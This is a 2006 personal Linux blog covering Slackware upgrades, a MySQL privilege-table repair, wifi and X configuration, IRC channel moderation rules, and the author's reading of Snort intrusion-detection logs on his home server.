Thursday, December 28, 2006

MySQL database corruption: fix

When I upgraded my main tower to Slack v11.0, I had also upgraded MySQL to v5.0.24a (I don't know what version I was using before this). Soon after the upgrade, I noticed that I couldn't access my local PHPBB and PHPMyAdmin installs.

I was receiving the following error using the MySQL client:

bash-3.1$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)


The MySQL error logs looked like this:

061227 03:08:12 mysqld started
061227 3:08:12 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=slackbox-bin' to avoid this problem.
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.24a-log' socket: '/tmp/mysql.sock' port: 0 Source distribution
061227 13:13:11 [Note] /usr/libexec/mysqld: Normal shutdown


Even after restarting the MySQL service, skipping grant tables, and reseting the password, the above still showed. So, I ran the following (after restarting the MySQL service using the init script):

bash-3.1$ mysql_fix_privilege_tables --verbose
This script updates all the mysql privilege tables to be usable by
MySQL 4.0 and above.

This is needed if you want to use the new GRANT functions,
CREATE AGGREGATE FUNCTION, stored procedures, or
more secure passwords in 4.1

You can safely ignore all 'Duplicate column' and 'Unknown column' errors
because these just mean that your tables are already up to date.
This script is safe to run even if your tables are already up to date!

ERROR 1060 (42S21) at line 22: Duplicate column name 'File_priv'
ERROR 1060 (42S21) at line 28: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 29: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 30: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 41: Duplicate column name 'ssl_type'
ERROR 1146 (42S02) at line 67: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 68: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 70: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 72: Table 'mysql.procs_priv' doesn't exist
ERROR 1054 (42S22) at line 94: Unknown column 'Type' in 'columns_priv'
ERROR 1060 (42S21) at line 100: Duplicate column name 'type'
ERROR 1060 (42S21) at line 110: Duplicate column name 'Show_db_priv'
ERROR 1060 (42S21) at line 127: Duplicate column name 'max_questions'
ERROR 1060 (42S21) at line 137: Duplicate column name 'Create_tmp_table_priv'
ERROR 1060 (42S21) at line 140: Duplicate column name 'Create_tmp_table_priv'
ERROR 1061 (42000) at line 145: Duplicate key name 'Grantor'
ERROR 1054 (42S22) at line 247: Unknown column 'Create_view_priv' in 'where clause'
ERROR 1054 (42S22) at line 277: Unknown column 'Create_routine_priv' in 'where clause'
ERROR 1054 (42S22) at line 313: Unknown column 'Create_user_priv' in 'where clause'
done
bash-3.1$


After that, I was able to access the databases using the root MySQL account:

bash-3.1$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
bash-3.1$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.24a-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> quit
Bye
bash-3.1$


The issue? Apparently, there were three duplicates of the "Grant_priv" column, which I don't think was the REAL issue. Per the script notes, duplicates don't appear to break anything, but looking at where the script notes state, "This script updates all the mysql privilege tables to be usable by MySQL 4.0 and above," I wonder if that's all I needed to do (because I upgraded to a higher version).

I sometimes become so reliant upon PHPMyAdmin that I don't always know how to fix underlying issues. It looks like I'll be delving into MySQL commandline more often, just to understand MySQL at a base level before utilizing front-end tools, or at least reference PHPMyAdmin's SQL query statements a bit more (which is a very cool feature, as the front-end puts what its doing into commandline structure).

I'm betting some of you are wondering why I'm using PHPBB on my LAN. I use it as a note-taking tool. Whatever machine I'm on in my LAN, I can reference important notes or create notes that are in a central location. Even if I'm at work or at a coffee shop, I can tunnel into my LAN and view all my notes. The only thing I have to remember is to back up my databases religiously so I don't lose very important data that will hinder my work at home (and somewhat at my workplace). Yeah, I know that there may be better ways to take notes, but my notes sometimes tend to be lengthy and when I'm troubleshooting, it's easy to create a thread of trial-and-error posts so I can keep track of what I need to do, what I've already done, or what I shouldn't do. There aren't too many tools that can organize and store data like a CMS can. :)

Happy Holidays!!

Tuesday, October 24, 2006

Using a PCMCIA Wifi Card On Your Laptop - Closed-source Chipsets

I've got my WPC54GS Linksys wifi card, which uses a closed-source chipset (Broadcom), working with Slackware 10.2 installed on a Dell Inspiron 8500. I've posted the process to get this working before at slackwiki.org.

I've scripted this process. You can grab the script from here. Edit it as you see fit. Many people actually use the tools that come with Slackware (the wireless configs in /etc/rc.d, I believe). I script my own, as I've many different wifi cards that I often swap out for different needs.

Anyways, give it a shot.

My next task is getting WPA working with the card (wpa_supplicant, I believe).

Ever Wonder How to Use A Mouse & Touchpad in X?

I remember, awhile back, I got a USB mouse and touchpad working in X on my first laptop (using Suse). Many people still ask this question in ##slackware.

All you do is ensure you have the following within your xorg.conf file:


Section "ServerLayout"
Identifier "X.org Configured"
Screen 0 "Screen0" 0 0
InputDevice "Mouse0" "CorePointer"
InputDevice "Mouse1" "SendCoreEvents"
InputDevice "Keyboard0" "CoreKeyboard"

.
.
.

Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/mouse"
EndSection

Section "InputDevice"
Driver "mouse"
Identifier "Mouse1"
Option "Device" "/dev/input/mice"
Option "Name" "Autodetection"
Option "Protocol" "imps/2"
Option "Vendor" "Logitech"
EndSection


You'll notice that the bold print is the print that you have to add to your pre-existing configuration.

The whole file is here.

Give it a whirl...and good luck!

Sunday, October 22, 2006

Recently Acquired a Dell Precision 220, Installed ZenWalk 3.0 on it

Yes, I got a Dell Precision 220 from work that they were going to throw in the trash (along with a Dell 17" CRT monitor). It lacked RAM and a hard disk. I scrounged up some RAM and this was a difficult task, as the system requires RAMBUS. I found 128MB between two chips of RAMBUS, which isn't a lot but it gets the system working. The system also supports SMP but only has one processor at the moment, a PIII Coppermine 650MHz CPU. It is peppy enough with ZenWalk.

Why ZenWalk? Because I've Slackware running on three systems already and wanted to try ZenWalk, which is a derivative of Slackware. It does well.

The system currently has three NICs, which is why I will eventually place it on firewall duty.

I'm trying to score two 1GHz CPUs (the max this system will take), although they'll have to be PIII Coppermines and also be matched. I found one such matching set locally on Craigslist, but have yet to coordinate a meet/buy. I may even put them into my Dell Precision 410 instead, and swap out the 410's 450MHz CPUs to the Precision 220.

I'll keep you informed on how ZenWalk is, as the days go by.

Friday, October 20, 2006

Xine and adding .wmv support; ModSecurity using Slackware 9.0 and Apache 1.3.37

I don't know why I hadn't done this before, but last night, I finally added .wmv support to Xine, following the directions at http://xinehq.de/index.php/faq#WMV. I had it functional using .wmv support within 5 minutes.

Please don't email me about how you got it working with mplayer. I don't do mplayer and any mplayer comments won't add value to my Xine experience. :)

I've also given ModSecurity a spin (see http://www.modsecurity.org/). It's VERY nice. I'm using it on my public Apache server (version 1.3.37), which runs Slackware 9.0...yes, I need to update, but its as production as I can get it and it is hardened, so I'm not so worried about it being quite a bit behind the versioning scheme. As long as it works.

What is ModSecurity? From the website, "ModSecurity is an embeddable web application firewall. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure." You can also get a core ruleset from the same site (). I've been trying to create my own rules with nil results, so I think I'll give the core rules a shot.

Try ModSecurity. I'm sure you'll like the logging, at the very least.

Tuesday, October 03, 2006

Slackware v11 out!!

From the Slackware-current changelog:

Sun Oct 1 23:50:53 CDT 2006
Slackware 11.0 is released. Thanks to everyone who helped out and made this
release possible. If I forgot you in the ChangeLog, mea culpa, but you know
who you are, and thanks. :-)
Enjoy! -P.

Sunday, October 01, 2006

Slack Machine Woes Fixed!

My Slack tower is fixed.

The root cause was that, somehow, when I created a new partition from some free space on the drive, the Slack install didn't like it one bit and complained the whole time. I'm not going to blame Gparted, though...

On this system, I use / to house the whole Slackware install, using /home as a directory instead of having it as its own partition. /home was 9+ GB and growing, so that / was at 92% in utilization. I decided to move it to its own partition. Using Gparted, I created a partition (/dev/hdb5). There were currently two primary partitions already on the drive (/ and swap), so I decided to create a logical partition to house /home. Somehow, Gparted fux0red the extended partition, I think.

Soon after I created the partition, I began to see boot errors hinting that there was a corruption problem with this drive, although if I sat through the boot errors, they'd finally stop and I'd get a login prompt.

I misdiagnosed the issue and thought that this 7-year-old drive had finally gave up the ghost. I almost trashed the drive but decided to give it another shot by removing the extended partition and making a new partition, a primary one. In fact, I made two and move /home to one of them (/dev/hdb2, I believe). Afterward, I adjusted my /etc/fstab to see /home and rebooted. There were no more errors on boot.

Next, I need to start doing nightly/weekly backups (somehow), then maybe clear out my /home and get rid of some junk (maybe backup to DVD).

Tuesday, September 26, 2006

Slackware-current is at RC5, as of 21 September

Yes, this is the longest string of RC status ever. Pat promises that this will be the last version before release. There's still a good bit of changelog activity, though.

Also, I've lost my Slackware tower. Well, its still here, but one of the drives went corrupt. I saw a ton of corruption in my Slack install's dmesg that didn't clear after doing an fsck. If anything it got a LOT worse. Luckily, I'd just done a backup of my /home dir to another drive, LIKE 5 MIN BEFORE THE DRIVE STARTED THROWING ERRORS! Talk about lucky. Now, I have an issue. This tower doesn't have a floppy drive (although I can hook one up). I need a floppy so I can boot up using a WinXP or MSDOS floppy that contains the format command...you see, I have to clear lilo from the boot drive's MBR before I can be able to use the system again, as the system currently tries to boot me into the bad drive (which I've removed...I'll double-check later whether its salvagable or not).

I guess this means I'm in the market for a new hard disk. This is the perfect opportunity for me to get another SATA drive, preferrably higher capacity than my 160GB drive. The drive that went corrupt was a Maxtor 60GB drive that I bought around 1999-2000...talk about long lived. What brand will I get next? Most likely a Seagate or Maxtor. I may get another 160GB Seagate so that I can give RAID a go (I've an onboard SATA RAID controller).

For now, I've no working Slackware machine...OK, shoot me cuz I just lied. I've my Dell Inspiron 8500 and my Toshiba Satellite 1GHz. Both need to be rsync'd, which means I have to use CAT5 to do the sync...last time I did an rsync over wifi, it wasn't pretty.

Anyways, I've my work cut out for me for the next two weeks. AND, I've to study so I can take the CCSA and CCSE exams.

Thursday, September 07, 2006

Slackware now at RC4 status, as of 3 Sep 2006

Yes, Slack is at RC4 now, and has been a bit dormant since the 3rd of September, with quite a few updates. The quietness may be a good indication that things are almost ready to go stable. We shall see.

I've yet to update to RC4, but maybe I'll get the chance this weekend.

Wednesday, August 30, 2006

Slackbox is now at RC3

I updated my machine to Slackware v11.0 RC3 last night. It didn't take long and I also moved my local mirror. I haven't noticed much of any difference in RC1 or RC2, function-wise. Nothing appears broken, although since I'm using 2.6.17.8, I've noticed a lot of 'atkbd' errors in my /var/log/messages file, which I attribute to my KVM not agreeing with that kernel. We shall see...

Sunday, August 27, 2006

Slackware Wikipedia Entry, ##slackware road rage that has to stop

Here it is: http://en.wikipedia.org/wiki/Slackware

The above link is for people who constantly enter ##slackware asking what Slackware is about or how it compares to other distributions.

The questions are highly irritating, as the information is ALL over the internet and people tend to not use http://www.google.com as it was intended. There are comparisons between Slackware and other distributions everywhere. Information on Slackware and its philosophy is also everywhere, so it is a bit ridiculous going to ##slackware and asking for comments, especially when one will most likely receive biased opinions: of course we aren't going to slight our own distribution.

##slackware on the whole has become very weird lately. We've lost a few old-timers that offered excellent support. We've also decided to kill the more off-topic banter unless there is absolutely nothing else to chat about...then we tend to get visitors who think we serve them like it is a paying job and we're customer support. We also have regulars who try to dictate to the channel operators the way the channel should be run...they pretty much threaten to hijack the userbase by opening other channels if they don't get their way or say in the matter.

I should explain how things should work:

1. I'm the head operator of ##slackware on irc.slackware.com. I maintain the channel's chat flow. I don't lord it over the channel. Proof that I do not abuse operator power is documented in your own IRC client logs (if you've visited ##slackware) or at http://wigglit.ath.cx/slackware_botlogs/.

2. The guidelines are enforced by the operators based on the guidelines posted at http://wigglit.ath.cx/slackware-rules/rules.shtml. Those rules SUPERCEDE the server guidelines (http://freenode.net/channel_guidelines.shtml). What's good for the server isn't necessarily good for our channel. Don't complain to the server ops about this because they will not become involved, as is their policy...they don't govern the channels, that's what the channel ops are for.

3. The channel guidelines are just that: guidelines. They are there to give the visitors an inkling of what's accepted and what's not. These are not constitutional laws, so when you find yourself banned because you think we won't take away your speech and we do, realize that IRC doesn't give you the right to tell someone to fuck off or post porn links or 'fight the man', with 'the man' being the channel operators.

4. Visitors should NOT expect us to answer every question that is asked. Some of us have day jobs. Some have families. Some may not have the experience or knowledge to answer the question. Some don't care. Don't expect the conversation to gravitate toward you when you ask a question. Current discussions may not stop when you ask your question, so don't get ticked off...keep asking (within limits; don't spam the channel with the same question every 60 seconds or you will get removed), maybe every 3 or so minutes. Also, BE SURE YOUR QUESTION PERTAINS TO SLACKWARE, AND NOT SOFTWARE THAT MAY BE INCLUDED IN SLACKWARE'S BASE INSTALL!! This means that if you've an issue with KDE or a KDE application that's installed on your Slackware distribution, your issue isn't slackware-related, its KDE-related, unless you can PROVE that the underlying issue is indeed related to Slackware. This also applies to hardware.

5. If anything happens in the channel that upsets you, take a deep breath and use your IRC client's ignore function to filter out the unwanted chatter. Don't take the matter into your own hands by insulting the offender, as you may become kicked or banned from the channel, regardless of your intentions. We recently had an incident where someone decided to attack someone based on the perception that the victim was overweight. The offender was asked to stop with a 'first and last warning' but continued 10 minutes later and was banned. Also, at this point, the victim had previously been passive to the attack, but became aggressive when the attacker ignored the operator's warning. After the attacker was banned, an onlooker decided to join the fray by insisting that the victim should also be banned because the victim defended himself by attacking also. The fact remains that the first attacker was banned because he directly ignored an operator's warning. The onlooker was also banned because he couldn't this issue, which was none of his business, die. Is all of this considered favoritism? In the above context, no, but if you're someone who is used to inciting anarchy, the rules/guidelines of ##slackware will never be enough. This is why every operator is empowered to handle things as they see fit, even when an abuser's tactics skirt the guidelines.

6. Lastly, if you bait an operator just for the sake of skirting guidelines, you're going to lose that battle. An intellectual debate is one thing, a targeted yet subtle attack is beyond the norm and will be dealt with.

I'll probably be posting the link to this entry to ##slackware so people can be aware of how assinine the drama in ##slackware has been lately.

A good example of some of the above activity can be found at this link:

http://wigglit.ath.cx/slackware_botlogs/slackware.log.27Aug2006

Use your browser's find function to find 'corto' and read from there until he gets his voice taken (around 4:22PM).

Slack-current now at RC3 status -- v11.0 release imminent !!

August 25th proved to be quite an active day for the -current changelog.

So, today, I've rsynced a mirror to my local mirror. FYI, I use the following when I rsync:

rsync --delete --progress --delete-excluded --exclude source/ --exclude zipslack/ -lpvrtz slackware.mirrors.tds.net::slackware/slackware-current /mnt/backup/ftp/pub/mirrors/slackware/

When I rsynced, I did it at 1:51PM and it finished at 1:57PM:

sent 381697 bytes received 545507254 bytes 1489465.08 bytes/sec
total size is 1890230078 speedup is 3.46

That's a pretty fast update in 6 minutes! Gotta love FiOS!

Anyways, when it is quiet today, I'll rsync my tower to RC3 then maybe do the same for my Toshiba (which is running v10.1, I think).

Friday, August 25, 2006

Slackware-current @ RC2 status ... Slack v11.0 should appear any day now!!

As you can see in the Slackware-current changelog, -current is at RC2 and has been for a few days.

I'm currently at RC1 on my main workstation...AND using the 2.6 kernel! As that machine uses SATA, I had a bit of a time getting my SATA drive to be seen. The box would boot (the main drive uses EIDE) but I couldn't reach out to my other drives installed in that machine. Well, all it took was to activate the proper module (I'll reference the driver later) to get SATA enabled again.

I've had no issues with RC1, but I'd like to upgrade my Toshiba to RC1 sometime this weekend, so see if there are any wireless issues. My Dell needs to be upgraded to RC1 also, but I hardly use the Linux partition on that laptop.

Other than that, Slackware is chugging along fine on my machines (and my public website at http://wigglit.ath.cx).

Monday, August 07, 2006

UPDATE - http://www.unixfool.com/slack9isolist.shtml

I've semi-updated the mirrors list. This list documents which Slackware mirrors contain ISOs for download. The title of the page is misleading, as it was created when v9.0 was considered fresh. I've checked the links and every link that is working contains v10.2.

I'll go through http://www.slackware.com/getslack to see which mirrors were added since my previous update, then I'll update my pages to reflect the new mirrors.

[EDIT -

I've stopped editing http://www.unixfool.com/slack9isolist.shtml, as it appears that almost every mirror now contains .iso files for the latest versions of Slackware. When this page was initially constructed, many users complained that they couldn't find .iso files on the mirrors, which wasn't the case. I immediately went through all the mirrors published on http://www.slackware.com/getslack and found approximately 10 that offered .iso files.

I may remove that page, as it is currently useless.]

On a side note, I've recently had Verizon's FiOS installed in my home. All I can say is, IT FLIES! And, I can't get enough of the router itself, an Actiontec MI424WR wireless router that appears to be much much more than a SOHO router, as it has TONS of options and configurability. I'm going to be enjoying this router and hope to keep it once my 1-year contract has ended. The only thing my previous router (Linksys WRT54GX4) has that is better is better wireless range, and that's because its a MIMO (three antennas) router.

I'll keep you guys posted on the FiOS front.

Also, it appears that Slackware has been releasing a ton of bugfixes. Let me restate: it isn't a Slackware-related issue; the updates are related to software (MySQL, Apache...). There has also been a lot of activity in regards to regular -current updates. I'm hoping this means v11.0 is almost ready. I've ben rsync'ing like crazy lately, trying to keep current on -current (LOL).

OK, its late here. G'night!

Wednesday, July 19, 2006

Patiently awaiting Slackware v11.0, Recent Snort Logs...

Yeah, I'm awaiting the release of Slackware v11.0. I should try to rsync my -current machines, which are on v10.1, I believe. That why I'll only have a short sync when v11.0 is released.

I also am scrubbing my logs on wigglit.ath.cx since I've been vacationing and had to attend a funeral in the last two weeks. I saw the below:

[**] [1:485:4] ICMP Destination Unreachable Communication Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
07/19-11:06:44.523876 0:B0:4A:6C:76:53 -> FE:FD:40:3E:E7:DC type:0x800 len:0x46
64.65.236.206 -> 66.160.141.30 ICMP TTL:246 TOS:0x0 ID:28020 IpLen:20 DgmLen:56
Type:3 Code:13 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED,
PACKET FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:43212 -> 64.65.236.206:113 TCP TTL:53 TOS:0x0 ID:15954 IpLen:20 DgmLen:56 DF
Seq: 0xB4CEF72C Ack: 0x10001
** END OF DUMP

I believe I've seen this before in my logs but I want to further investigate it to get a better understanding of what it means.

I've been neglecting my Slackware installs the last month, as I've recently purchased a white Mac Book (2.0 GHz). I'm currently trying to get used to the internal file structure and commands, as they sometimes differ from FreeBSD's typical commands. I've also started a blog documenting my Mac experiences ... see it at http://whitemacbook.blogger.com .

Wednesday, June 28, 2006

Been Busy...again

Hi,

Yeah, I've been busy. Work-related stuff, really, although Summer is upon us and I also have to deal with the kids and relatives visiting (and visiting relatives). I haven't had much time to slack around with Slackware, although I did purchase a Mac Book 7 days ago.

I'll be attempting to build a dedicated box that firewalls and routes traffic. For some reason, I get a lot of latency with my current setup. I've a Netgear FVS114 FW/VPN SOHO set-top box as my router/switch and a Linksys WRT54GX4 that I use as a WAP. The Linksys is on its own subnet since I wanted to experiment with securing my WAP in the best manner. I love the Netgear's capabilities (it appears more capable than the Linksys in doing what I want to do...I've already ran into issues where I think I was asking the Linksys to do things it wasn't designed to do). I plan to configure a VPN tunnel between the Netgear and a friend's gateway, to build my VPN skills. What I don't like is the fact that the Netgear appears to lag under load:

ron@delly$ ping 10.150.1.1
PING 10.150.1.1 (10.150.1.1): 56 data bytes
64 bytes from 10.150.1.1: icmp_seq=0 ttl=64 time=1.790 ms
64 bytes from 10.150.1.1: icmp_seq=1 ttl=64 time=1.147 ms
64 bytes from 10.150.1.1: icmp_seq=2 ttl=64 time=1.138 ms
64 bytes from 10.150.1.1: icmp_seq=3 ttl=64 time=1.501 ms
64 bytes from 10.150.1.1: icmp_seq=4 ttl=64 time=1.136 ms
64 bytes from 10.150.1.1: icmp_seq=5 ttl=64 time=1.144 ms
64 bytes from 10.150.1.1: icmp_seq=6 ttl=64 time=1.185 ms
64 bytes from 10.150.1.1: icmp_seq=7 ttl=64 time=1.153 ms

I'm not seeing any packets being dropped, but look at the times! I don't remember them being like that before, although my niece (or rather my wife's niece) does do some heavy downloading, I think.

Anyways, here's the WAP's ping results:

ronald-sinclairs-computer:~ rsinclair$ ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=2.571 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.246 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.392 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.253 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.728 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=1.924 ms
64 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.680 ms
c64 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=2.368 ms
64 bytes from 192.168.1.1: icmp_seq=8 ttl=64 time=2.792 ms

NASTY! Again, there is no apparent packet loss, but look at the times.

At work, when I'm shelled into home, I can barely work, as I have to wait for keystrokes to register and also will ocassionally lose my SSH connection. I will check my Snort output and logs to make sure I'm not being hammered by someone.

Monday, June 05, 2006

Trident Video Drivers?

I'm currently using one of my two laptops (Toshiba Satellite 1805-S274), trying to get X.org drivers working with this laptop. I think I've the driver working with X.org:

bash-3.00$ sudo cat /var/log/Xorg.0.log | grep trident
(II) LoadModule: "trident"
(II) Loading /usr/X11R6/lib/modules/drivers/trident_drv.o
(II) Module trident: vendor="X.Org Foundation"
bash-3.00$

So, it appears that the driver is loaded, yet:

bash-3.00$ glxgears
324 frames in 7.0 seconds = 46.286 FPS
291 frames in 7.0 seconds = 41.571 FPS
140 frames in 5.0 seconds = 28.000 FPS
280 frames in 8.0 seconds = 35.000 FPS
140 frames in 5.0 seconds = 28.000 FPS
bash-3.00$

Those FPS aren't all that hot. Running 'glxinfo', I get the following:

bash-3.00$ glxinfo
name of display: :0.0
display: :0 screen: 0
direct rendering: No
server glx vendor string: SGI
server glx version string: 1.2
server glx extensions:
GLX_ARB_multisample, GLX_EXT_visual_info, GLX_EXT_visual_rating,
GLX_EXT_import_context, GLX_OML_swap_method, GLX_SGI_make_current_read,
GLX_SGIS_multisample, GLX_SGIX_fbconfig
client glx vendor string: SGI
client glx version string: 1.4
client glx extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_MESA_allocate_memory,
GLX_MESA_swap_control, GLX_MESA_swap_frame_usage, GLX_OML_swap_method,
GLX_OML_sync_control, GLX_SGI_make_current_read, GLX_SGI_swap_control,
GLX_SGI_video_sync, GLX_SGIS_multisample, GLX_SGIX_fbconfig,
GLX_SGIX_pbuffer, GLX_SGIX_visual_select_group
GLX extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_OML_swap_method,
GLX_SGI_make_current_read, GLX_SGIS_multisample, GLX_SGIX_fbconfig
OpenGL vendor string: Mesa project: www.mesa3d.org
OpenGL renderer string: Mesa GLX Indirect
OpenGL version string: 1.2 (1.5 Mesa 6.2.1)
OpenGL extensions:
GL_ARB_depth_texture, GL_ARB_imaging, GL_ARB_multitexture,
GL_ARB_point_parameters, GL_ARB_point_sprite, GL_ARB_shadow,
GL_ARB_shadow_ambient, GL_ARB_texture_border_clamp,
GL_ARB_texture_cube_map, GL_ARB_texture_env_add,
GL_ARB_texture_env_combine, GL_ARB_texture_env_crossbar,
GL_ARB_texture_env_dot3, GL_ARB_texture_mirrored_repeat,
GL_ARB_transpose_matrix, GL_ARB_window_pos, GL_EXT_abgr, GL_EXT_bgra,
GL_EXT_blend_color, GL_EXT_blend_func_separate, GL_EXT_blend_logic_op,
GL_EXT_blend_minmax, GL_EXT_blend_subtract, GL_EXT_clip_volume_hint,
GL_EXT_copy_texture, GL_EXT_draw_range_elements, GL_EXT_fog_coord,
GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels, GL_EXT_point_parameters,
GL_EXT_polygon_offset, GL_EXT_rescale_normal, GL_EXT_secondary_color,
GL_EXT_separate_specular_color, GL_EXT_shadow_funcs,
GL_EXT_stencil_two_side, GL_EXT_stencil_wrap, GL_EXT_subtexture,
GL_EXT_texture, GL_EXT_texture3D, GL_EXT_texture_edge_clamp,
GL_EXT_texture_env_add, GL_EXT_texture_env_combine,
GL_EXT_texture_env_dot3, GL_EXT_texture_lod_bias, GL_EXT_texture_object,
GL_EXT_texture_rectangle, GL_EXT_vertex_array, GL_APPLE_packed_pixels,
GL_ATI_texture_env_combine3, GL_ATI_texture_mirror_once,
GL_ATIX_texture_env_combine3, GL_IBM_texture_mirrored_repeat,
GL_INGR_blend_func_separate, GL_MESA_pack_invert, GL_MESA_ycbcr_texture,
GL_NV_blend_square, GL_NV_point_sprite, GL_NV_texgen_reflection,
GL_NV_texture_rectangle, GL_SGIS_generate_mipmap,
GL_SGIS_texture_border_clamp, GL_SGIS_texture_edge_clamp,
GL_SGIS_texture_lod, GL_SGIX_depth_texture, GL_SGIX_shadow,
GL_SGIX_shadow_ambient, GL_SUN_multi_draw_arrays
glu version: 1.3
glu extensions:
GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess

visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav
id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat
----------------------------------------------------------------------
0x23 24 tc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x24 24 tc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x25 24 tc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x26 24 tc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x27 24 dc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x28 24 dc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x29 24 dc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x2a 24 dc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
bash-3.00$

It's more gibberish than anything, to me. I'll figure this out. Actually, maybe I should be hacking my more recent Dell instead.

On the laptop note, I'm seriously thinking on getting the Macintosh MacBook (13"), white edition. While the black looks nice, the pricetag reflects a $200 difference than the white one, with very little hardware difference. Maybe this X-mas?!

Thursday, May 18, 2006

Talk about time lapse!

I plugged in my Toshiba that happens to be running Slackware-current. It's been off awhile and I noticed that the time was an hour or so behind, so I ran the below:

root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:05 ntpdate[2185]: step time server 198.123.30.132 offset 4042.874524 sec
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:09 ntpdate[2188]: adjust time server 198.123.30.132 offset -0.000203 sec

I know this thing has a CMOS battery. Why the hell did it lose that much time??

I also got a Dell Precision 220 from work yesterday. They were going to throw it out. It's a decent system, but a coworker stripped the RAM before I got ahold of it. Unfortunately, it requires RAMBUS RAM. I'm looking now on eBay for some cheap RAMBUS RAM. The machine is dual proc capable but has one 667MHz Pentium III CPU. It is all IDE instead of SCSI like my Precision 410, but that's OK. It's internal layout is nice for a flat case. It has 2xUSB ports in the back. It has 5 PCI slots, so I can add a USB 2.0 PCI card when I get the chance. It has an integrated NIC (10/100) and came with a V770 PCI vidcard. It also has a Zip Drive. It has space for two hard disks and a CD drive. I have spare hard disks (all SCSI though). I may add SATA technology to it, though. I also grabbed a 17" CRT monitor that was about to be trashed also, and a bunch of CAT5 (that was golden, as CAT5 is expensive). I only need to decide what OS/distro I'm going to put on it...maybe NetBSD, as I already have a FreeBSD and an OpenBSD box). I also need to decide what duties this box will perform. The box has some life left, as it will take a gig of RAM and the CPU is upgradable to 1GHz.

I now need a big rack, as my systems are starting to pile up and my computer room looks horrendous!

A Dell rep or contractor will be showing up at my home tomorrow to repair my Inspiron 8500's monitor. Tomorrow is the last day of its service contract. I may renew it, as that laptop is my powerhouse machine, the most high-end system I have. My self-built tower probably has more raw horsepower (it's my gaming machine) but the Inspiron is troublefree and does indeed have a serious power at 2GHz. I usually watch my TiVo'd movies on it, crunch data on it when I boot into Slackware (it's a dual boot machine), or watch DVDs.

I'm still eyeing a Mac laptop or maybe even a Mac mini. Funds are the issue. We shall see what the near future holds for me. ;)

Monday, May 15, 2006

Another example of log correlation

Tailing my Snort logs this morning, I found the below:

[**] [1:1882:10] ATTACK-RESPONSES id check returned userid [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/14-20:05:01.237145 213.92.8.4:6667 -> 66.160.141.30:32811
TCP TTL:48 TOS:0x0 ID:41299 IpLen:20 DgmLen:212 DF
***AP*** Seq: 0xF793F39A Ack: 0xDDC1DA82 Win: 0x2180 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1184125330 36300125


I then searched for the actual payload with the below command:

tcpdump -Xvnner /var/log/snort/snort.log.1147297546 | less

I then hit the '/' button and entered the source IP (213.92.8.4), which showed me the Snort payload of this specific alert:

20:05:01.237145 00:b0:4a:6c:76:53 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 226: IP (tos 0x0, ttl 48
, id 41299, offset 0, flags [DF], length: 212) 213.92.8.4.6667 > 66.160.141.30.32811: P [tcp sum ok] 4153668506:
4153668666(160) ack 3720469122 win 8576
0x0000: 4500 00d4 a153 4000 3006 fbb1 d55c 0804 E....S@.0....\..
0x0010: 42a0 8d1e 1a0b 802b f793 f39a ddc1 da82 B......+........
0x0020: 8018 2180 42f8 0000 0101 080a 4694 5192 ..!.B.......F.Q.
